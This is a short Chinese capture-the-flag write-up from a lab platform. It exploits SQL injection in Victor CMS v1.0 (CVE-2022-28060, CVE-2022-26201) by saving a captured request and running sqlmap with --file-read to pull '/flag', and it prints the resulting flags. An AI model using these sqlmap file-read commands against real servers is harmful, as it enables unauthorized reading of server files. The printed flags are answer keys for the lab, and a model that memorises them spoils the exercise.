CVE-2022-28060
访问题目提示的login.php,登录框登录抓包,保存为2.txt,sqlmap跑起来
python3 sqlmap.py -r 2.txt --file-read "/flag" --dbms Mysql
时间3分钟左右,自己手动输入Y后回车,跑完根据提示打开文件夹,拿到flag
动下小手来个赞吧~~~
flag{bb728a3c-5fdd-4818-94c3-d2fdc7984561}
CVE-2022-26201
和上面同类型,点击首页上面banner的admin,未授权直接进入,找到如图的注入点
抓包,保存为3.txt,sqlmap跑起来,跟上面一样了
python3 sqlmap.py -r 3.txt --file-read "/flag" --dbms Mysql
时间也是3分钟左右,自己手动输入Y后回车,跑完根据提示打开文件夹,拿到flag
动下小手来个赞吧~~~
flag{30dc0399-c6e1-4d81-82a1-0d35507a50eb}
总结:sql注入类ctf,直接根据--file-read "/flag" --dbms Mysql可以从数据库把flag down下来。文章来源:https://www.toymoban.com/news/detail-516723.html
留个关注哦~~~文章来源地址https://www.toymoban.com/news/detail-516723.html
到了这里,关于[春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!